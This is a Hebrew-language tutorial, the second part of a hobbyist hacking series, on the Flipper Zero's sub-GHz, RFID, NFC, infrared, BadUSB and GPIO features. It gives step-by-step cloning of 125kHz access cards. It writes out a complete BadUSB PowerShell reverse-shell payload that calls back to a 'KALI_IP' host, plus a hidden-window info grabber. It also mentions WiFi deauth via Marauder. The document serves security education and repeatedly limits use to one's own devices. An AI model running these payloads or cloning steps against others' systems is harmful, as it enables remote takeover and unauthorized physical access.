The Hacker's Path: סדרה בת 5 חלקים
חלק 1: מבוא → חלק 2: שליטה ב-Flipper → חלק 3: יסודות Kali → חלק 4: ניצול → חלק 5: הביקורת המלאה
בחלק 1, עשיתם את הצעדים הראשונים. שכפלתם שלטי IR, סרקתם כרטיסי NFC, צפיתם בספקטרום ה-sub-GHz מאיר ותקלדתם "Hello World" עם BadUSB. ראיתם שאבטחה היא לעתים קרובות אשליה.
עכשיו נכנסים לעומק. בסוף המאמר הזה, תבינו כל פרוטוקול עיקרי שה-Flipper Zero שלכם יכול לתקשר איתו, לא רק איך להשתמש בהם, אלא למה הם עובדים ככה ומה זה אומר לאבטחה.
אזהרה הוגנת: אתם עומדים לגלות שכמה דברים שהנחתם שהם מאובטחים... לא מאובטחים.
הפילוסופיה של Flipper
לפני שנצלול לפרוטוקולים, בואו נקבע את הגישה הנכונה. ה-Flipper Zero הוא לא "מכשיר פריצה" במובן ההוליוודי. הוא כלי למידה שמאפשר לכם לתקשר עם תדרי רדיו ופרוטוקולי חומרה שבדרך כלל בלתי נראים.
חשבו עליו כזכוכית מגדלת לאותות אלחוטיים. האותות תמיד היו שם. פשוט לא יכולתם לראות אותם. עכשיו אתם יכולים.
⚠️ תזכורת: רק הדברים שלכם
הכל במאמר הזה מיועד לבדיקת המכשירים, הכרטיסים והמערכות שלכם בלבד. הטכניקות עובדות על הדברים של כל אחד, זה הנקודה. אבל שימוש בהם על מערכות שאינן שלכם הוא בלתי חוקי.
Sub-GHz: הספקטרום הבלתי נראה
תדרי רדיו תת-גיגהרץ נמצאים בכל מקום. דלת המוסך, שלט הרכב, תחנת מזג האוויר, הפעמון האלחוטי, חיישני לחץ צמיגים, מכשירי בית חכם, כולם משדרים כל הזמן בתדרים מתחת ל-1 GHz.
נוף התדרים
- 315 MHz: צפון אמריקה: דלתות מוסך ישנות, שלטי רכב
- 390 MHz: צפון אמריקה: דלתות מוסך, כלי רכב מסוימים
- 433.92 MHz: עולמי: תחנות מזג אוויר, חיישנים, מכשירים אירופיים, מוצרי IoT רבים
- 868 MHz: אירופה: בית חכם, LoRa, מוני שירותים
- 915 MHz: אמריקה: LoRa, בית חכם, תעשייתי
פרויקט: נתחו את דלת המוסך שלכם
זמן: 15 דקות
מה תלמדו: ההבדל בין קודים סטטיים לקודים מתגלגלים, ולמה זה חשוב
שלבים:
- נווטו ל-Sub-GHz → Read
- עמדו ליד המוסך
- לחצו על כפתור השלט של המוסך
- צפו ב-Flipper לוכד את האות
- בדקו מה נלכד
מה אתם עשויים לראות:
- Princeton, Linear, Chamberlain (ישן): קודים סטטיים. אותו קוד כל פעם. פגיע להתקפות חזרה.
- KeeLoq, Security+ 2.0, Rolling Code: קודים מתגלגלים. כל שידור משתמש בקוד אחר מרצף מסונכרן.
קודים מתגלגלים בהסבר
דלתות מוסך ושלטי רכב מודרניים משתמשים בקודים מתגלגלים. ככה הם עובדים:
- המשדר והמקלט חולקים seed סודי ואלגוריתם
- כל לחיצת כפתור מייצרת את הקוד הבא ברצף מסונכרן
- המקלט מקבל את הקוד הנוכחי או כל אחד מ-~256 הקודים הבאים
- קוד שנעשה בו שימוש מבוטל לנצח
פרויקט: לכדו נתוני תחנת מזג אוויר
זמן: 10 דקות
מה תמצאו: טמפרטורה, לחות, מצב סוללה, מזהה חיישן, הכל משודר בטקסט גלוי. ללא הצפנה, ללא אימות.
RFID: עולם ה-125kHz
RFID בתדר נמוך (125kHz) הוא טכנולוגיית כרטיסי קרבה ישנה ופשוטה יותר. תמצאו אותה בכרטיסי חדר כושר, כרטיסי גישה ישנים למשרדים, חניונים ומערכות כניסה לבניינים.
והיא כמעט אוניברסלית נוראית לאבטחה.
איך עובד RFID 125kHz
הכרטיסים האלה פסיביים, אין להם סוללה. כשמחזיקים אחד ליד קורא, השדה האלקטרומגנטי של הקורא מזין את הכרטיס, והכרטיס משדר את מספר הזיהוי שלו. זהו. ללא challenge-response. ללא הצפנה. רק: "אני כרטיס מספר 12345."
סוגי כרטיסים נפוצים
- EM4100: נפוץ מאוד. משדר פשוט מזהה של 40 ביט. אפס אבטחה.
- HID Prox: כרטיס הגישה הארגוני הנפוץ ביותר. אפס אבטחה.
- Indala: פחות נפוץ. אותה בעיה: ללא אבטחה.
- AWID: גרסה נוספת. אותה חולשה יסודית.
פרויקט: שכפלו את כרטיס חדר הכושר
זמן: 5 דקות
מה תצטרכו: כרטיס ה-125kHz שלכם, כרטיס ריק T5577 ($1-2 ליחידה)
שלבים:
- נווטו ל-125 kHz RFID → Read
- החזיקו את הכרטיס נגד גב ה-Flipper
- המתינו לקריאה מוצלחת
- שמרו עם שם מזוהה
- לבדיקת אמולציה: Saved → Select Card → Emulate
לכתיבה על T5577 ריק:
- לכו לכרטיס השמור
- בחרו Write
- החזיקו כרטיס T5577 ריק ליד ה-Flipper
- המתינו לאישור כתיבה
- עכשיו יש לכם שכפול פיזי
נקודה מרכזית
אבטחת RFID 125kHz היא תיאטרון טהור. מערכות אלה מניחות שלא תוכלו לקרוא, להעתיק או לכתוב מחדש נתוני כרטיסים. כל שלוש ההנחות שגויות עם ציוד צרכני שעולה פחות מ-$200.
NFC: עולם ה-13.56MHz
NFC בתדר גבוה (13.56 MHz) הוא הדור החדש יותר.
סוגי כרטיסי NFC
- MIFARE Classic: נפוץ מאוד. הצפנה קניינית שנפרצה לפני שנים. פגיע.
- MIFARE Ultralight: כרטיסים פשוטים עם אבטחה מינימלית.
- NTAG: נפוץ בתגיות NFC לאוטומציה.
- MIFARE DESFire: באמת מאובטח. הצפנת AES.
- EMV (כרטיסי תשלום): הצפנה חזקה, מגבלות עסקאות וזיהוי הונאה.
פרויקט: נתחו את כרטיס העבודה שלכם
זמן: 10 דקות
שכפול UID לעומת שכפול מלא
הבחנה חשובה: ה-Flipper תמיד יכול לקרוא ולאמלט את ה-UID של כרטיס. מערכות מתקדמות בודקות גם UID וגם נתונים מוצפנים.
כרטיסי קסם ל-NFC
- Gen1 (UID ניתן לשינוי): יכול לכתוב UID מותאם.
- Gen2 (CUID): תאימות טובה יותר.
- Gen3 (UFUID): יכול לנעול UID אחרי כתיבה.
- Gen4 (Ultimate Magic): הגמיש ביותר.
אינפרא-אדום: שליטה מלאה
בניית ספריית השלטים המושלמת
הקושחה Momentum כוללת IRDB, מסד נתונים עצום של שלטים מוקלטים מראש.
פרויקט: בנו את ארסנל ה-IR שלכם
זמן: 20 דקות
לכידת IR גולמית
נווטו ל-Infrared → Learn New → Raw כשהלמידה הסטנדרטית לא מזהה אות.
BadUSB: האלטרנטיבה ל-Rubber Ducky
BadUSB מנצל פגם יסודי: מחשבים סומכים באופן מרומז על מקלדות. ה-Flipper שלכם יכול להקליד כ-1,000 תווים בשנייה.
יסודות DuckyScript
REM This is a comment
DELAY 1000
STRING Hello World
ENTER
GUI r
ALT F4
CTRL c
TAB
DOWNARROW
ESCAPEפרויקט: אוסף מידע מערכת
REM System Info Grabber - Run on YOUR machine only
DELAY 1000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING $info = @{
ENTER
STRING Hostname = $env:COMPUTERNAME
ENTER
STRING Username = $env:USERNAME
ENTER
STRING Domain = $env:USERDOMAIN
ENTER
STRING IP = (Get-NetIPAddress -AddressFamily IPv4).IPAddress
ENTER
STRING OS = (Get-WmiObject Win32_OperatingSystem).Caption
ENTER
STRING }
ENTER
STRING $info | ConvertTo-Json | Out-File "$env:USERPROFILE\Desktop\sysinfo.json"
ENTER
STRING exit
ENTERפרויקט: הגדרת Reverse Shell
ב-Kali - הפעלת listener:
nc -lvnp 4444
Payload BadUSB (יעד Windows):
REM Reverse Shell - Replace KALI_IP with your Kali's IP
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('KALI_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
ENTER⚠️ ה-Payloads האלה אמיתיים
השתמשו בהם רק על מחשבים שלכם.
Payloads מהנים להדגמות
REM Rick Roll - Opens YouTube
DELAY 1000
GUI r
DELAY 500
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
ENTERREM Fake Windows Update - Fullscreen prank page
DELAY 1000
GUI r
DELAY 500
STRING https://fakeupdate.net/win10ue/
ENTER
DELAY 2000
F11REM Flip Screen Upside Down (Windows)
DELAY 1000
CTRL ALT DOWNARROWGPIO: הרחבת חומרה
מודולים חיוניים
- WiFi Dev Board: מוסיף יכולות WiFi. חיוני מחלק 3.
- אנטנה חיצונית CC1101: מרחיבה דרמטית את טווח ה-Sub-GHz.
- ESP32 Marauder: הופך את ה-Flipper לפלטפורמת פריצת WiFi/Bluetooth.
- ProtoBoard: לפרויקטים מותאמים אישית.
פרויקט: הגדרת WiFi Dev Board
שלבים:
- Flash קושחת Marauder ל-ESP32
- חברו לפיני GPIO של ה-Flipper
- נווטו ל-GPIO → ESP32 → Marauder
- עכשיו יש לכם סריקת WiFi, deauth ולכידת חבילות
תכונות Momentum מתקדמות
- אנימציות שולחן עבודה: קוסמטיות בלבד, אבל כיפיות.
- פרוטוקולים מורחבים: תמיכה נוספת בפרוטוקולים.
- מרכז אפליקציות: משחקים, כלים, תוכנות עזר.
- חבילות נכסים מותאמות: שנו את כל המראה.
מה שיטרתם
עכשיו אתם מבינים:
- Sub-GHz: איך מתקשרים דלתות מוסך, שלטי רכב וחיישנים
- RFID 125kHz: למה כרטיסי חדר כושר ותגים ישנים ניתנים לשכפול טריוויאלי
- NFC 13.56MHz: ההבדל בין הצפנה שבורה (MIFARE Classic) לאבטחה אמיתית (DESFire)
- אינפרא-אדום: איך לבנות ספריית שלטים אוניברסלית
- BadUSB: למה אמון USB HID הוא פגיעות יסודית
- GPIO: איך להתרחב ל-WiFi, טווח מורחב וחומרה מותאמת
ה-Flipper שלכם הוא עכשיו נשק. אבל הוא מברגה בהשוואה ל-Kali Linux, שהוא סדנה שלמה. הגיע הזמן לאתחל את סביבת הפריצה האמיתית.
The Hacker's Path
סדרה בת 5 חלקים שלוקחת אתכם מסקרנים למסוגלים.
חלק 1: מבוא חלק 2: שליטה ב-Flipper ✓ חלק 3: יסודות Kali חלק 4: ניצול חלק 5: ביקורת מלאה
רשימת בדיקה לחלק 2
☐ Sub-GHz: דלת מוסך נותחה, קודים מתגלגלים לעומת סטטיים הובנו
☐ RFID 125kHz: כרטיסים נקראו, לפחות שכפול אחד נבדק
☐ NFC: כרטיס עבודה נותח, סוג כרטיס זוהה
☐ אינפרא-אדום: ספריית שלטים מלאה לבית נבנתה
☐ BadUSB: Payload מידע מערכת נבדק, reverse shell הובן
☐ GPIO: WiFi dev board מוכן לחלק 3
☐ כרטיסי קסם: T5577 ו/או כרטיסי NFC קסם נרכשו לבדיקות
מה הלאה
בחלק 3, עוזבים את היכולות הממוקדות של ה-Flipper ונכנסים לסביבת בדיקות חדירה מלאה: Kali Linux.
תלמדו:
- הקמת מעבדת פריצה (התקנה והגדרת VM)
- סיור רשת עם nmap
- סיור אלחוטי: לכידת handshakes WiFi עם aircrack-ng
- סיור ווב: גילוי מה הנתב שלכם חושף
- חיבור לכידות Flipper לזרימות עבודה של Kali
נתראה בחלק 3.